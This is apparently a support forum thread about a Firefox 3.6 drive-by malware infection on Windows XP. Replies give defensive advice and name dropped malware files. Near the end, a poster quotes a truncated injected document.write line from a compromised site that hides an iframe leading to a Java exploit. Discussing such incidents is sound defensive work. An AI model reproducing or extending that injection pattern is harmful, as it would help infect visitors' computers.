Virus automaticaly installed by Js / Firefox just viewing a page
On Firefox 3.6 windows XP, security failure seems to allow installation of a virus code just by viewing a page with the code bellow and javascript activated. How can i avoid this? What are the effects of the virus, do I have to worry about my data being stolen or other trojan installed? (Note that I have updated to 3.6.3 after getting the virus, but I don't know if it makes Firefox safe) Thanks you for your help
This happened
Not sure how often
== viewing a page that contains the javascript code
All Replies (10)
What web site and what bug are you referring to? It is quite unlikely that a website can install a virus on your computer via JavaScript. Nonetheless, you should install a virus scanner on your computer (like Symantec, McAfee, etc.) and keep it up to date.
1. Firefox 3.6, 3.6.1 and 3.6.2 had a critical security bug which allowed remote code execution. I'm glad you have installed 3.6.3 which solves this bug.
2. Right now my Firefox reports this page as fishing site and blocks it so that it would be difficult for user to visit it.
The bat file you show tries to delete Internet Explorer from your computer. If you are a Limited User, it will not work because it will not have enough privileges.
3. Update Java!!! Maybe, it was exploitation of Java vulnerability.
In this post the same virus was found, and the same version of Java (1.5.0_06) was installed.
Also update Shockwave Flash, Adobe Reader and Adobe Acrobat and anything else you can update.
4. I would recommend installing NoScript extension for Firefox. It will block by default all Java, Javascript, Flash, etc, so you will manually allow running of scripts for trusted sites (like Google, Wikipedia, etc) while others will be blocked. One more benefit is that some advertisements will be blocked, too.
Thank you for your feedback.
I found this script on an private "professional" intranet page that requires to log in to find this script. So I can't give you the address. But you can copy and paste the script to try and, at least with ff 3.6 only the javascript does the trick.
I do have an up to date virus scanner but it does not detect anything wrong with file wwwzuc32.exe
To wikiwide: 1. I hope it was a critical security fixed on 3.6.3, but I'd rather avoid to try it again!
2. Unfortunately, I had to desactivate the fishing site feature (because of network configuration concerns), so it didn't worked for me
I don't worry about the bat file but with the wwwzuc32.exe (property info shows name Totalcommander)
3. I'm quite sure it is not a java exploit. I think I don't use java at all, I might just delete it then. I made xp updates; i will check for others thank you for the advice.
4. I use webdeveloper and have java always desactivated. I will try noscript too, thanks
I read again the post you mention, but it doesn't explain what kind of infection it was. Anyhow, I guess I don't have anything else to do, except hoping it didn't steal or destroy data...
Thanks again for your help
There are more file's installd on my system. look for smss32.exe, 41.exe, es15.exe, 6334.exe, 18467.exe, helpers32.dll, orphan_11, and usnjrnl. i can not start regedit. i can not start task manager.
i will not make contact with that system to internet.
Well I haven't found any of these files.
But the trojan is still not detected by antivir nor spybot...
Thanks
Disable Adobe Acrobat plugin, it's the weakest link. It's often use in conjunction with Java. But disable acrobat first, see how it goes.
Just a follow up...
Antivirus is very important. Often times, it will prevent the script from running, so make sure your "shield" is up!
But if you do decide to disable your antivirus temporarily (on rare occasion), please either:
1. Don't connect to the internet. 2. Use Chome (haven't infected me thus fas, we'll see) 3. Disable "javascript", "java", and "acrobat" plugins. They are often the source of exploit.
Another follow up...
If you do get infected, instead of cleaning it up manually, or with you antivirus, try to do a system restore first. That will usually solve your problem. It will prevent the malicious code/executable from starting up. Then run your antivirus to remove all traces of the virus or trojan (mostly trojan) scattered in the harddisk.
Thanks for the informations. By the time, i have learned to live with it (without I hope) since it's too late to do a restore, and no virus nor trojan are detected (not a good point as i do have the virus in a backup file in a safe place).
Have this problem when visiting user profiles on: http://www.pbxinfo.com/index.php
e.g. http://www.pbxinfo.com/index.php?action=profile;u=128882
http://www.pbxinfo.com/Themes/default/script.js?fin11
document.write('<style>.r0cw8x6ak { position:absolute; left:-1719px; top:-1633px} </style>everyone's profile page seems to contain an iframe to the java exploit and whatever else, launches an executable along the lines of fox~it1.exe and a few java applets. Works on the latest version of Firefox + Java.
Ilungisiwe